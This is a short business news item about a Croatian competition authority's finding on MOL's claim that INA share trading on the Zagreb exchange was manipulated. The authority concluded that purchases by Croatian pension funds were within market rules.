Purpose:
To test the candidate.s understanding of similarities and differences between APT and the
CAPM.
Argument
State whether
Argument is
Correct or
Incorrect
(Circle One)
Incorrect
Correct
Reading Reference:
.An Introduction to Portfolio Management,. Ch. 8, Investment Analysis and
Portfolio
Management, 5th edition, Frank K. Reilly and Keith C. Brown (Dryden, 1997)
Purpose:
To test the candidate.s: 1) ability to calculate portfolio risk and return measures,
and 2)
understanding of alternative risk measures.
Guideline Answer:
A. Subscript OP refers to the original portfolio, ABC to the new stock, and NP to the
new
portfolio.
NP = [wOP
2 OP 2 + wABC
2 ABC 2 + 2wOP wABC COV]1/2
COV = 0 (2.37)(0) = 0
NP = [wOP
2 OP 2 + wGS
2 GS 2 + 2wOP wGS COV] 1/2
C. Adding the risk-free government securities would cause the beta of the new portfolio
to be
lower. The new portfolio beta will be a weighted average of the individual security betas
in
the portfolio; the presence of the risk-free securities would lower that weighted average.
D. The comment is not correct. Although the standard deviations and expected returns of
the
two securities under consideration are the same, if all other factors are equal.
E. i. Grace clearly expressed the sentiment that the risk of loss was more important to
her than
the opportunity for return. Using variance (or standard deviation) as a measure of risk in
her case has a serious limitation because it does not distinguish between positive and
negative price movements.
ii. Two alternative risk measures that could be used instead of variance are:
Range of Returns, which considers the highest and lowest expected returns in the
future
period, with a larger range being a sign of greater variability and therefore of greater risk;
Semivariance, which can be used to measure expected deviations of returns below the
mean or some other benchmark, e.g., zero.
Either measure would potentially be superior to variance for Grace. Range of returns
would help to highlight the full spectrum of risk she is assuming, especially the downside
portion of the range about which she is so concerned. Semivariance would also be
effective, because it implicitly assumes that the investor wants to minimize the likelihood
of returns falling below some target rate; in Grace.s case, the target rate would be set at
zero (to protect against negative returns).
2001 Level II Guideline Answers
Morning Section . Page 19
LEVEL II, QUESTION 9
Reading References:
1. .The Financing Decision,. Ch. 6, including Appendix, Analysis for Financial
Management,
5th or 6th edition, Robert C. Higgins (Irwin, 1998 or 2000)
2. .General Principles of Credit Analysis,. Level II, Ch. 9, Fixed Income Analysis
for the
Chartered Financial Analyst Program, Frank J. Fabozzi, (Frank J. Fabozzi
Associates, 2000)
3. An Example of How to Use and Compute Effective Duration and
Effective Convexity, Gerald
W. Buetow, Jr., Robert R. Johnson, and Donald L. Tuttle (AIMR, 1999)
4. .The Analysis and Valuation of Bonds,. Ch. 16, pp. 525-579, Investment
Analysis and
Portfolio Management, 5th edition, Frank K. Reilly and Keith C. Brown (Dryden,
1997)
Purpose:
To test the candidate.s: 1) ability to evaluate the use and effects of leverage, and 2)
understanding of the relationship between leverage and credit quality.
Guideline Answer:
A. Interest expense increases $4.25 million because only $50 million of the $100 million
capital
investment is funded with debt at an interest rate of 8.50 percent ($50 million × 0.085 =
$4.25
million). The other $50 million comes from the sale of new equity. The new equity
causes
outstanding shares to increase by 2 million ($50 million / $25 per share). The completed
pro
forma is as follows:
$108,675
15,250
93,425
28,027.50
$65,397.50
14,000
$4.67
B. i. Buckner.s Cash Flow from Operations-to-Total Debt is less than desired (0.44 vs.
0.50)
and Total Debt-to-Total Capital is greater than desired (0.54 vs. 0.50), both of which
would no longer satisfy LightStreet.s credit quality standards.
ii. If Deven is correct, the yield on Buckner.s outstanding bonds would increase 20 basis
points (bps); each of the two factors in (i) above would contribute 10 bps to the increase
in yield. Because the outstanding bonds have a modified duration of 6.50 years, their
price is expected to decline by 1.3 percent as a result of the deteriorating credit quality:
Reading Reference:
Fixed Income Analysis for the Chartered Financial Analyst Program,
Frank J. Fabozzi (Frank J.
Fabozzi Associates, 2000)
A. .Mortgage-Backed Securities,. Level II, Ch. 3
B. .Valuing Mortgage-Backed and Asset-Backed Securities,. Level II, Ch. 5
Purpose:
To test the candidate.s: 1) understanding of prepayment risk, and 2) ability to use the
OAS
concept to evaluate asset-backed securities.
Guideline Answer:
A. The prepayment risk associated with declining interest rates is contraction risk: The
upside
price potential is compressed because of accelerating prepayments, and the cash flows
must
be reinvested at lower rates. The average life of the pass-through shortens.
The prepayment risk associated with rising interest rates is extension risk: The price
decline
is exacerbated because of slowing prepayments. The average life of the pass-through
lengthens.
2001 Level II Guideline Answers
Morning Section . Page 23
In this case, Tranche I appears to be the least expensive on a relative value basis because,
for
the same duration, it carries a higher option adjusted spread (108 basis points) and lower
option cost (28 basis points). That is,
Purpose:
To test the candidate.s: 1) understanding of the risk-return characteristics of bonds with
embedded options, and 2) ability to calculate various valuation measures for a convertible
bond.
Guideline Answer:
A. i. Conversion value of a convertible bond is the value of the security if it is
converted
immediately. That is,
= market price of the common stock × conversion ratio
= $40 × 22
= $880
ii. Market conversion price is the price that an investor effectively pays for the common
stock if the convertible bond is purchased.
= market price of the convertible bond / conversion ratio
= $1,050 / 22
= $47.7273 ˜ $47.73
2001 Level II Guideline Answers
Morning Section . Page 25
iii. Premium payback period is the period of time that it takes the investor to recover the
premium paid for the convertible bond. Because the investor generally receives higher
coupon interest from the convertible bond than would be received from the common
stock dividends (based on the number of shares equal to the conversion ratio), the period
of time to recover the premium can be determined.
Premium payback period = conversion premium per share / income differential per share
Conversion premium/share = $47.7273 . $40 = $7.7273
Income differential/share = ($1,000 × 6.5%) / 22 . $1.20 = $2.9545 . 1.20 = $1.7545
Premium payback period = $7.7273 / $1.7545 = 4.4043 ˜ 4.40 years
Change
Determine whether the
value will Increase,
Decrease, or
Remain Unchanged
(Circle One)
Justify your response with one reason
An increase in
stock price
volatility
Increase
Decrease
Reading Reference:
1. .The Term Structure and the Volatility of Interest Rates,. Level II, Ch. 1 Fixed
Income
Analysis for the Chartered Financial Analyst Program, Frank J. Fabozzi
(Frank J. Fabozzi
Associates, 2000)
2. .The Analysis and Valuation of Bonds,. Ch. 16, pp. 525-579, Investment
Analysis and
Portfolio Management, 5th edition, Frank K. Reilly and Keith C. Brown (Dryden,
1997)
Purpose:
To test the candidate.s: 1) understanding of different theories of the term structure of
interest
rates, and 2) ability to evaluate the effects of term structure changes on fixed income
securities.
Guideline Answer:
A. The government yield curve will steepen with the yields for longer maturities
increasing and
the yields for shorter maturities decreasing. According to Preferred Habitat Theory,
yields at
the long end of the curve will increase because of the increased supply of longer maturity
debt and the reluctance of investors to move into this sector without adequate
compensation.
Similarly, short rates will decline because of the decreased supply of short-term debt and
the
reluctance of investors to leave this sector.
2001 Level II Guideline Answers
Morning Section . Page 27
B. This question may be answered based on either the Fabozzi reading or the Reilly and
Brown
reading. Fabbozzi solves the problem using Key Rate Duration and Reilly and Brown use
Modified Duration. Both solutions are presented below:
ii. Strategy II
% . MV15yr = –15.00 × (0.25%) = –3.75%
% . MVStrategy II = 1.0 × (–3.75%) = –3.75%
Modified Duration
i. Strategy I
% . MV5yr = .4.83 × (.0.75%) = 3.6225%
% . MV25yr = .23.81 × (0.50%) = .11.9050%
% . MVStrategy I = 0.5 × (3.6225%) + 0.5 × (.11.9050%) = .4.1413%
ii. Strategy II
% . MV15yr = –14.35 × (0.25%) = –3.5875%
% . MVStrategy II = 1.0 × (–3.5875%) = –3.5875%
Reading Reference:
.The Swaps Market: Introduction,. Ch. 20, pp. 608.625 and 632.643, Futures, Options
&
Swaps, 3rd edition, Robert W. Kolb (Blackwell, 1999)
Purpose:
To test the candidate.s: 1) understanding of a fixed-for-fixed currency swap, and 2)
ability to
evaluate the effect of a swap on a company.s borrowing costs.
Guideline Answer:
A. World would assume both counterparty risk and currency risk.
Counterparty risk is the risk that Bishop.s swap.s
maturity.
Reading Reference:
Futures, Options & Swaps, 3rd edition, Robert W. Kolb (Blackwell, 1999)
A. .Futures Prices,. Ch. 3, pp.43-76
B. .Stock Index Futures: Introduction,. Ch. 7, pp. 202-212
Purpose:
To test the candidate.s understanding of and ability to use the cost-of-carry model in
evaluating
futures positions.
Guideline Answer:
A. According to the cost-of-carry rule, the futures price must equal the spot price plus
the cost of
carrying the spot commodity forward to the delivery date of the futures contract.
F0,6 = 185.00 (1 +
2
06 . 0 )
F0,6 = 190.55
Cash Inflows:
Buy 1 contract of TOBEC stock index futures (December contract)
Sell the index spot at 185.00 × $100 = $18,500
Invest the proceeds at the risk-free rate for six months (until the expiration of the six-
month contract)
$18,500 × (1 +
2
06 . 0 ) = $19,055 | https://www.scribd.com/document/389571595/Shivendra-CFA-Sample-Question-doc | CC-MAIN-2019-35 | refinedweb | 18,971 | 55.44 |
Five Myths about Managed Code
CLR Team
My name is Immo Landwerth and I was a Program Manager intern this year in the CLR team. In this blog post I am not going to showcase any of the fantastic features that will ship with .NET 4.0 – my colleagues in the CLR team know them much better and already did a fabulous job discussing them here, over there and on Channel 9.
Instead I want to discuss the following five myths about managed code and in particular about the CLR:
· Managed code is always JIT compiled
· Generic co- and contra variance are new in .NET 4.0
· Everything is an object
· .NET only supports statically typed languages
· Microsoft is not using Managed Code
Myth Five – Managed code is always JIT compiled
Having a JIT compiler has many advantages because a lot of things are becoming much easier when a JIT compiler is available:
1. On-the-fly code generation (System.Reflection.Emit) is much easier because you only have to target one virtual machine architecture (IL) instead all the processor architectures the runtime supports (such as x86 and x64).
2. To some degree it solves the fragile base class library problem. That means we can share class definitions across modules without having the problem that changes such as adding fields or adding virtual methods crashes dependent code.
3. The working set can be improved because the JIT only compiles methods that are actually executed.
4. Theoretically, you could take situational facts into consideration, such as which processor-architecture is actually used (e.g. is it SSE2 capable), the application usage patterns etc. and optimize differently for them.
However, JIT compilation also has downsides such as:
1. It takes time. That means JIT compilation always has to trade-off time vs. code quality.
2. The code is stored on private pages so the compiled code is not shared across processes.
Therefore we created a tool called NGEN that allows you to pre-create native images during the setup. You could call this ahead-of-time compilation (as opposed to just-in-time). Certain special conditions left aside (such as some hosting scenarios or profiling), the runtime will now pick up the native images instead of JIT-compiling the code.
Why did we not allow you to pre-create the native images during build time and let you ship the native images directly? Well, because we then run into the fragile base class library problem mentioned above. In that case, your native images would get invalid every time the .NET Framework is updated. Today we solve this problem by re-running NGEN on the customer’s machine when the framework is serviced. In .NET Framework 4 we ship a new feature called targeted patching, that allows us for method-body only changes to minimize or to even to fully avoid recompilation. For more details about NGEN in general see here and for more details about NGEN in .NET Framework 4 see here.
Even if you are not using NGEN for you application code: for desktop CLR applications all the assemblies that are part of the .NET Framework itself are not JIT compiled – instead the runtime will bind to the native images. So even in these cases only your application code will be JIT compiled and therefore both ahead-of-time as well as just-in-time technologies are used simultaneously. Thus, stating that all code is JITted is simply wrong.
Myth Four – Generic co- and contra variance are new in .NET 4.0
The short answer is ‘no’. The longer answer is ‘well, sort of’.
But I am getting ahead of myself. Let’s first see what co- and contravariance actually means. Generic covariance allows you to call a method that takes an IEnumerable<Shape> with an IEnumerable<Circle> (if Circle is derived from Shape). This is useful if Shape contains, e.g. a method that allows you to compute the area. This way you can write a method that computes the area for any collection of shapes. Contravariance on the other hand allows you to call a method that takes an IComparer<Circle> with an IComparer<Shape>. This is handy if someone wants to compare circles and you already have created a general comparer for any shape (this works because if your comparer knows how to compare two instances of Shape it certainly is also able to compare two instances of Circle).
The support for co- and contra variance has always been in the CLR since generics came up in the .NET Framework 2.0. However, as Rick Byers pointed out you would have to use ILASM for creating covariant and contravariant type definitions:
In IL, covariant type parameters are indicated by a ‘+’, and contravariant type parameters are indicated by a ‘-‘ (non-variant type parameters are the default, and can be used anywhere).
What has been added in the .NET 4.0 release is language support for C# and Visual Basic. For example, the following uses the C# syntax (in and out modifiers for the generic type declaration) to create some covariant and contra variant types:
Myth Three – Everything is an object
“Wait a minute – this is the number one programming promise everyone was making about .NET!” you might say now. Yes, and yet it is false. Many .NET or C# books make this mistake in one form or the other. “Everything is an object”. Although we believe there is a lot of value in simplifying things for didactic reasons (and hence many authors just claim it that way) we would like to take this opportunity to tell you “sorry, it is not completely true”.
Before we discuss this issue we should first define what the sentence “everything is an object” is supposed to mean. The interpretation we will use here is this:
Every type is derived from a single root (System.Object). This means, that every value can be implicitly casted to System.Object. More precisely, this means that every value is representable as an instance of System.Object.
So why is this not true for the CLR? The counter example is a whole class of types that are not derived from System.Object: pointers (such as int*). So you cannot pass a pointer to a method that takes an object. In addition you cannot call the ToString or GetHashCode methods on a pointer.
We could also use a different interpretation of “everything is an object” such as:
Every type is derived from a single root (System.Object). This means, that every value is an object at all times.
Why is this different? Simple values (i.e.. values that have types derived from System.ValueType) are not objects by the definition of an object (they lack identity). But every value can be casted implicitly to System.Object (because System.ValueType is derived from System.Object). However, in that case an object instance that contains the value is created. This process is called boxing. The resulting object instance (the “box”, not to be confused with Don Box) has indeed a notion of identity (which is in particular also true for Don Box).
As you can see, the CLR uses the first interpretation and yet it is still not completely true as pointers do not derive from System.Object.
Myth Two – .NET only supports statically typed languages
It is true that the CLR uses a static type system. But this does not necessarily mean that it is only suited for programming languages that use a static type system. At the end, the programming language is implemented using the CLR but it is not identical with the CLR. So do not be fooled by the fact that the type system and mechanics of C# almost map directly to first class CLR-concepts. In fact, there are many concepts in C# that the CLR is not aware of:
1. Namespaces. As far as the CLR is concerned namespaces do not even exist. They are just implemented as type prefixes separated by dots (so instead of saying ‘the class Console is contained in the namespace System’ the CLR would just say ‘there is a class called System.Console’).
2. Iterators. The CLR does not provide any support for it. All the magic is done by the compiler (if you want to know, the compiler turns your method into a new type that internally uses a state-machine to track the current point of execution. Details can be found here).
3. Lambdas. They are just syntactic sugar. For the runtime these are just delegates, which in turn can also be considered syntactic sugar. In fact, a delegate is nothing more than a class derived from System.MulticastDelegate that provides an Invoke, BeginInvoke and EndInvoke method with the appropriate parameters.
Please note that this list is not complete. Instead it is only used to show you that even C# has to implement itself on top of the CLR and hence it is not a 1:1 mapping of the concepts the runtime provides. What does this have to do with static typing vs. dynamic typing? The answer is simply: you can implement a dynamically typed system on top of a statically typed system.
If you know see a huge business opportunity here, we have to disappoint you. Some smart people already had the same idea. This effort is called the Dynamic Language Runtime, or DLR for short. If you are like me then you immediately think of native code when someone mentions the term ‘runtime’. However, the DLR is completely implemented in C# and is just a class library that can be used by programming languages to implement dynamic systems on top of the CLR. The DLR shares the fundamental design principle of the CLR, i.e. it provides a platform for more than one language. That means you can share IronPython objects with IronRuby objects because they are implemented with the same underlying runtime (the DLR).
With .NET 4.0 the DLR ships as part of the box. So while .NET has first-class support for statically typed languages through the CLR it also provides first-class support for dynamically typed languages through the DLR.
Myth One – Microsoft is not using Managed Code
We often hear this (“Office and Windows are still not built on top of managed code!”) when customers ask about performance and future investments of Microsoft in managed code. The reasoning goes like this:
Since Microsoft is not implementing Windows and Office in managed code that means that it must be significantly flawed/runs much slower than native code and therefore their long term strategy will still be C++. This in turn means that we should not use managed code either.
In fact Microsoft has a huge investment in managed code (although it is still true that Office and Windows are not implemented in managed code). However, there are a bunch of products that are significantly (if not completely) implemented in managed code:
1. Windows components, such as
a. PowerShell
b. System Center
2. Office components, such as
a. Exchange
b. SharePoint/Office Server
3. Developer Tools, such as
a. Visual Studio and Visual Studio Team System
b. Expression
4. Dynamics
This list if by far not complete but it should be large enough to convince you that we are in fact ‘eating our own dog food’.
The reason that not all products are written in managed is not only related to performance. Sometimes the wins of re-implementing working native code in managed code do not outweigh its costs. On the other hand, there are still scenarios in which managed code simply cannot be used today (such as building the CLR itself or the debugger).
However, we will not deny that there are scenarios in which we cannot compete with the performance of native code today. But this does not mean that we have given up on this. In fact, projects like Singularity should show you that we are really very ambitious about redefining the limits of the managed world.
The last thing to keep in mind is that manually optimized assembler code is also faster than plain C-code. But this does not mean that all operating systems are completely written in assembler.
Thus our vision is more like this: native code where it makes sense, managed code where it makes sense with the bigger portion being managed. | https://devblogs.microsoft.com/dotnet/five-myths-about-managed-code-2-2/ | CC-MAIN-2021-49 | refinedweb | 2,067 | 63.9 |
Have you met your new favorite LDAP directory, OpenDS?
Oh, you haven't?
Well, dude. Let me make some introductions.
Introducing the first stable release of the OpenDS Project,
OpenDS 1.0.0!
You've got an awesome package with this one, folks. OpenDS promises:
OpenDS is an open source LDAP directory written in - you guessed it - 100% Java.
- Maximum, extensible interoperability with LDAP client apps
- Directory-related extras, such as directory proxy, virtual directory, namespace distribution and data synchronization
- Ability to embed the server in other Java apps
What's really cool is that, with the Java WebStart installer Quick Start, you can have the OpenDS server configured, up and kickin' in less than 3 minutes!
Lightspeed Java action? Sweet.
But, y'know, I may be a tad biased ;] Check it out for yourself!
Learn a little more about it at the OpenDS Wiki,
or download OpenDS 1.0.0 right now!
- Duke | http://blogs.sun.com/duke/entry/have_you_met_your_new | crawl-002 | refinedweb | 154 | 66.54 |
Does not check for local auth entries in keyring if couchdb.html is present and parseable.
Bug #668409 reported by Roman Yepishev on 2010-10-29
This bug affects 4 people
Bug Description
STR:
1. Open seahorse, remove all desktopcouch tokens (simulate almost fresh start)
2. Stop desktopcouch service, start desktopcouch service.
3. Re-open seahorse
Expected results:
2 new entries for DesktopCouch auth
Actual results:
Np new entries.
Reason:
class _Configuration(
def __init__(self, ctx):
...
try:
...
return
...
# code to add couchdb entries to keyring
Workaround:
remove ~/.local/
I believe couchdb should definitely check for keyring items presense.
Joshua Hoover (joshuahoover) on 2010-11-11
Joshua Hoover (joshuahoover) on 2010-11-12
Joshua Hoover (joshuahoover) on 2012-10-15
Joshua Hoover (joshuahoover) on 2012-11-01
In Oneiric this causes the thunderbird to show the following error message:
There was a problem opening the address book "Ubuntu One" - the message returned was: Cannot open book: Could not create DesktopcouchSession object.
The workaround is to remove ~/.local/
share/desktop- couch/couchdb. html and restart desktopcouch- service | https://bugs.launchpad.net/desktopcouch/+bug/668409 | CC-MAIN-2017-13 | refinedweb | 175 | 67.45 |
give some idea for installed tomcat version 5 i have already tomcat 4
how to call jsp from flex
how to call jsp from flex hi,
i want to know that how can i call a FLEX from JSP.
. A good Example will be appreciated
Diff ways to call a EJB from Servlet, JSP - Java Interview Questions
Diff ways to call a EJB from Servlet, JSP How can I call EJB from Servlet or JSP
Hi
Hi I want import txt fayl java.please say me...
Hi,
Please clarify your problem!
Thanks
how do i make a phone call from my app without quitting my application
how do i make a phone call from my app without quitting my application hi,
I am working on creating a call application, i am making a call from my... quits , i want my application to go to background and resume on call end ...please
call from java - JavaMail
call from java Hi,
how i will call servlet from java..
plz its urgent..
Thanks
Narendra Hi Narendra,
You can use the java.net package to call a servlet from the java code
Hi.. - Struts
Hi..
Hi Friends,
I am new in hibernate please tell me.....if i am using hibernet with struts any database pkg is required or not.....without... me Hi Soniya,
I am sending you a link. I hope that, this link
UIWebView call javascript function
UIWebView call javascript function Hi,
I am developing web browser for iPhone and iPhone devices. I want to call the java script in my html page from UIWebView. Please let's know how to call JavaScript function from objective c
hi
online multiple choice examination hi i am developing online multiple choice examination for that i want to store questions,four options,correct answer in a xml file using jsp or java?can any one help me?
Please..
hi.. I want upload the image using jsp. When i browse the file then pass that file to another jsp it was going on perfect. But when i read...);
for(int i=0;i<arr.length-1;i++) {
newstr=newstr
Hi... - Struts
Hi... Hi,
If i am using hibernet with struts then require... of this installation Hi friend,
Hibernate is Object-Oriented mapping tool... more information,tutorials and examples on Struts with Hibernate visit
Hi
Hi The thing is I tried this by seeing this code itself.But I;m facing a problem with the code.Please help me in solving me the issue.
HTTP Status... an internal error () that prevented it from fulfilling this request.
exception
conference call
conference call hi
am a java beginner I want to develop a simple conference call system over a LAN can u please enlighten me on the basics that I have to do and kno first
Hi.. - Struts
Hi.. Hi,
I am new in struts please help me what data write in this file ans necessary also...
struts-tiles.tld,struts-beans.tld,struts........its very urgent Hi Soniya,
I am sending you a link. This link
call frame - Java Beginners
call frame dear java,
I want to ask something about call frame to another frame and back to first frame.
I have FrameA and FrameB. In frameA...);
} Hi friend,
I am sending you a running code. I hope - EJB
ejb how can i run a simple ejb hello application.please give me the detailed procedure. Hi Friend,
Please visit the following links: - form fields but it couldn't work can you fix what mistakes i have done</p>...
}//execute
}//class
struts-config.xml
<struts
I want detail information about switchaction? - Struts
I want detail information about switch action? What is switch action in Java? I want detail information about SwitchAction
Ejb Module
}
/**
* This is the action called from the Struts framework.
* @param mapping...Ejb Module Respected Sir/Mam
I m using jdk1.5 and jboss4.0.2
Here... Administrator
*/
public class sunLoginAction extends Action {
/** Creates a
same thing i want but from db..
same thing i want but from db..
same thing i want but from db
getting null value in action from ajax call
getting null value in action from ajax call Getting null value from ajax call in action (FirstList.java)... first list is loading correctly. Need...-default">
...
<action name="StudentRegister" class | http://roseindia.net/tutorialhelp/comment/5224 | CC-MAIN-2014-10 | refinedweb | 715 | 74.19 |
(newbie) java reflection problem
Emmanuel Jourdan
Feb 09 2006 | 5:13 pm
Emmanuel Jourdan
Feb 09 2006 | 5:30 pm
Emmanuel Jourdan
Feb 09 2006 | 5:54 pm
I just found it also. It works like a charm.
Thanks for the explanations. ej
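The reflection approach that "works like a charm" — resolving a Method by name once in the constructor, then invoking it for each incoming list — can be sketched as follows. The class and method names here are assumptions for illustration, not ej's actual code, and the Max-specific plumbing is left out:

```java
import java.lang.reflect.Method;

// Hypothetical sketch, not ej's actual code: resolve the operation once
// by name (as a reflection-based list object might), then invoke it per list.
public class ReflectiveOp {
    private final Method op; // resolved once in the constructor

    public ReflectiveOp(String opName) {
        try {
            // e.g. "add" resolves to the add(float[], float[]) method below
            op = getClass().getMethod(opName, float[].class, float[].class);
        } catch (NoSuchMethodException e) {
            throw new IllegalArgumentException("unknown operation: " + opName, e);
        }
    }

    public float[] apply(float[] a, float[] b) {
        try {
            return (float[]) op.invoke(this, a, b);
        } catch (ReflectiveOperationException e) {
            throw new RuntimeException(e);
        }
    }

    public float[] add(float[] a, float[] b) {
        int n = Math.min(a.length, b.length);
        float[] out = new float[n];
        for (int i = 0; i < n; i++) out[i] = a[i] + b[i];
        return out;
    }
}
```

Note that Method.invoke boxes its arguments and returns Object, which is part of why reflective dispatch is slower than a direct call — the concern Ben raises below.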
projects
Feb 09 2006 | 6:23 pm
Hi Emmanuel,
Glad you solved your problem. Since it seems like you are doing this for speed reasons, I thought I would mention that I've read that the reflection API is very slow. You may want to benchmark these three different solutions:
1. the reflection solution you've already got working,
2. the if / else switching code you were trying to avoid,
3. the interface design pattern.

Your interface would look something like this:
public interface ListOperator { public float[] operate(float a[], float b[]); }
and the addition class would look something like this:
public class ListAddition implements ListOperator { public float[] operate(float a[], float b[]) { ..... } }
and then in your MaxObject's constructor you could create an instance of the operator requested:
ListOperator myListOperator;
public simpleOp(Atom[] args) { declareIO(2,1); myListOperator = new ListAddition(); }
and call it like so in your float method:
public void inlet(float f[]) { if (getInlet() == 1) b = f; else { a = f;
outlet(0, myListOperator.operate(a,b)); }
This is the standard Java design pattern for this type of problem and I suspect it will be the fastest.
Ben
Emmanuel Jourdan
Feb 09 2006 | 6:54 pm
Hi Ben,
Thanks for the suggestions. I'll try to test the different versions soon. But, to be sure I understand correctly, with the interface solution, I still need a "big" if/else to do the List operator choice, right?
if (op.equals("+")) myListOperator = new ListAddition(); else if (op.equals("-")) myListOperator = new ListSoustraction();
Best, ej
projects
Feb 09 2006 | 6:59 pm
> Thanks for the suggestions. I'll try to test the different versions > soon. But, to be sure I understand correctly, with the interface > solution, I still need a "big" if/else to do the List operator > choice, right?
yes, but just in the constructor, not in the method that handles incoming lists.
Another place to look for ideas of how you might set up your code is the ListProcessor stuff I made for the initial Max 4.5 release.
Ben
topher lafata
Feb 09 2006 | 7:15 pm
I also was just reading some stuff that faster reflection is possible using the sun.misc.Unsafe class. This class is pretty interesting and lives up to its name! Topher
projects
Feb 09 2006 | 8:10 pm
> I'll look at it more slowly. Just one thing about this package, I use > a lot, is there any possibility to rename list.sum and list.delta in > list.Sum and list.Delta. There's just two classes with the first > letter un lowercase.
Yeah, sorry about that. Can't rename them anymore, since they could be used in other people's patches, but feel free to rename your local copies. :)
Ben
topher lafata
Feb 09 2006 | 8:41 pm
i am pretty sure you would have to rename and recompile if you take that route. toph
projects
Feb 09 2006 | 10:27 pm
> i am pretty sure you would have to rename and recompile if you take > that route.
Yes, and change the constructor code to be capitalized. I am so used to Eclipse, which would not only rename and modify the code for that class appropriately, it would also look through all the projects in your workspace to rename the class anywhere else it was used. The ability to refactor as easily as that is a big reason I like developing in Java.
Ben
Emmanuel Jourdan
Feb 10 2006 | 2:35 pm
projects
Feb 10 2006 | 4:30 pm
> On the list operator problem, I made the different versions (with if, > with reflection, with interface). >
> > The performances (measured in Max) are quite the same (the interface > solution is generally a little bit faster). Is there any better > strategy to evaluate the speed of the java code?
Yes, there is something very important here to understand. When you are testing a piece of code for speed it is important to isolate it from as much other code as possible. In the test patch that you set up, the reason the three Java classes were so close in execution time is that the test time was completely dominated by the slow boundary crossing between Java and C. In other words, it's very important to avoid all inlet and outlet calls when testing various pieces of Java code against one another.
I've attached a new lop-tests.zip. I added an "iterations" attribute to each class, I added a calculeResultat() method to each class that calculates the result but doesn't output it, and I added an iterate() method that uses a for loop to call the calculeResultat() method iterations times. I modified the patch so that the same lists were sent to all three Java objects, and then the iterate method is called on all three.
To give you an idea of the difference in speed between internal Java calculations and the boundary crossing of inlet and outlet calls, with your old method 5 iterations were taking about 210 ms on my computer. With my new method, 60000 iterations take 254 ms using reflection, 247 ms using if statements, and only 212 ms using the Interface design pattern. So it looks like the Interface design pattern is significantly faster.
But on the other hand - and this is probably the most valuable thing to keep in mind when working with Java for small utility objects like this - in the context of a patch, the execution time of this object will be completely dominated by the input/output boundary crossing between Java and C. So unless you're doing a LOT of math in response to input messages, it's really not worth the time to highly optimize your Java code, because you probably won't notice the difference anyway. For example, according to this test using the Interface design pattern instead of Reflection will save you 0.7 MICROSECONDS every time you want to multiply some lists together.
To make the most of your Max programming time, write Java code that works and is easy to read.
> The problem with the interface solution is that > you get a lot a class files.
Yeah, I know, this is an unfortunate. One way to deal with this is to bundle class files into a JAR file.
Ben
topher lafata
Feb 10 2006 | 6:23.
topher
Emmanuel Jourdan
Feb 10 2006 | 6:39 pm
projects
Feb 10 2006 | 9:56.
Well actually it's not as bad as I thought. :) I took another look at Emmanuel's patch and classes. There is an important thing that can change to improve the performance by a lot.
inlet(float[]) and inlet(int[]) are optimized and are faster than inlet(Atom[]). I just tested it out, and this small change reduced the time taken to process an inlet call by almost 65%. In other words, according to my unscientific test inlet(Atom[]) is three times slower than inlet(float[]) and inlet(int[]).
With this trick in place, performance is pretty good. The object takes in two lists, processes, and sends out a list in somewhere between 20 and 60 microseconds. That includes all the surrounding C objects doing their timing work.
Ben
ps. outlet(float[]) and outlet(int[]) are similarly optimized over outlet(Atom[])
topher lafata
Feb 10 2006 | 10:00 pm
Not really much documentation on this one.
in the console:
javap sun.misc.Unsafe
topher
topher lafata
Feb 10 2006 | 10:15 pm
Cool Ben. The inlet stuff explains some other behavior someone was telling me about!
> ps. outlet(float[]) and outlet(int[]) are similarly optimized over > outlet(Atom[])
as are outlet(String msg, float[]), outlet(String msg, int[])!
Toph
kawkhins
Feb 11 2006 | 9:34 am
Hi,
> inlet(float[]) and inlet(int[]) are optimized and are faster than > inlet(Atom[]). I just tested it out, and this small change reduced
does the measurements exclude the time for creating Atom[] and int[] ? because creating an array of atom of int seams longer than creating an int array.
regards, chris
projects
Feb 11 2006 | 5:37 pm
> does the measurements exclude the time for creating Atom[] and int[] ? > because creating an array of atom of int seams longer than creating an > int array.
Well yes, because the test was comparing the performance of inlet calls. So it is faster for the mxj C code to create an array of ints or floats than it is for the code to create an array of Atoms.
Ben
Emmanuel Jourdan
Feb 11 2006 | 6:06 pm
projects
Feb 11 2006 | 6:40 pm
Hi,
> You mean list(float[] something), don't you?
Yes, sorry.
> By the way, I though list method could > only accept atoms, as suggest the MaxObject.html.
Thanks for mentioning this - I see that MaxObject was not updated the way it should have been when the optimization for list(float[]) and list(int[]) was added. I'll address this shortly.
Ben
Forums
Java | https://cycling74.com/forums/newbie-java-reflection-pb/ | CC-MAIN-2017-39 | refinedweb | 1,538 | 71.04 |
- Issued:
- 2018-05-17
- Updated:
- 2018-05-17
RHBA-2018:1603 -.)
Changes to the openstack-neutron component:
- Previously, when an interface was removed from a router, the metadata proxy for the network was not updated even though isolated metadata was enabled on the DHCP agent. As a result, instances were not able to fetch metadata if they are on the network no longer connected to the router. This fix updates the metadata proxy so when a router interface is removed, instances are still able to fetch metadata from the DHCP namespace. (BZ#1540452)22972 - One or more additional pools are created when creating a load balancer with two pools. Error when trying to delete the loadbalancer
- BZ - 1540452 - neutron-ns-metadata-proxy disappeared
- BZ - 1542065 - [Backport to RHSOP 10] Auth token information missing from requests with no args Edit
- BZ - 1545939 - neutron lbaas commands take a long time to complete
- BZ - 1560698 - In newton , neutron-lbaas adds --connection-limit value only in the frontend
CVEs
(none)
References
(none)
Red Hat OpenStack 10
The Red Hat security contact is [email protected]. More contact details at. | https://access.redhat.com/errata/RHBA-2018:1603 | CC-MAIN-2022-05 | refinedweb | 185 | 55.47 |
#include <Path.h>
Inheritance diagram for Track::Path:
Definition at line 43 of file Path.h.
Draw the object if it is visible.
Reimplemented from Track::Drawable.
Definition at line 439 of file Path.cpp.
Draw the object.
Called indirectly by draw(const OcclusionTester &) const when it is on the screen, but can also be called manually if view bounds are not known.
Implements Track::Drawable.
Definition at line 415 of file Path.cpp.
Get the Axis aligned bounding box of the object.
The object is contained entierly within this region.
Implements Track::AABBBounded.
Definition at line 466 of file Path.cpp.
Generated at Mon Sep 6 00:41:18 2010 by Doxygen version 1.4.7 for Racer version svn335. | http://racer.sourceforge.net/classTrack_1_1Path.html | CC-MAIN-2017-22 | refinedweb | 121 | 62.44 |
13 January 2011 18:04 [Source: ICIS news]
PRAGUE (ICIS)--An allegation of market manipulation aimed at blocking an attempt by Hungarian group MOL to obtain a majority stakeholding in ?xml:namespace>
Oil, gas and petrochemical group MOL made the claim in December after its buyout price offer to small shareholders of oil company INA was suddenly outstripped by INA's share price on the Zagreb stock exchange.
AZTN, which probed the trading in the stock at the request of MOL, said the price surge was driven by demand for the shares from Croatian pension funds and that all their purchases were within market rules.
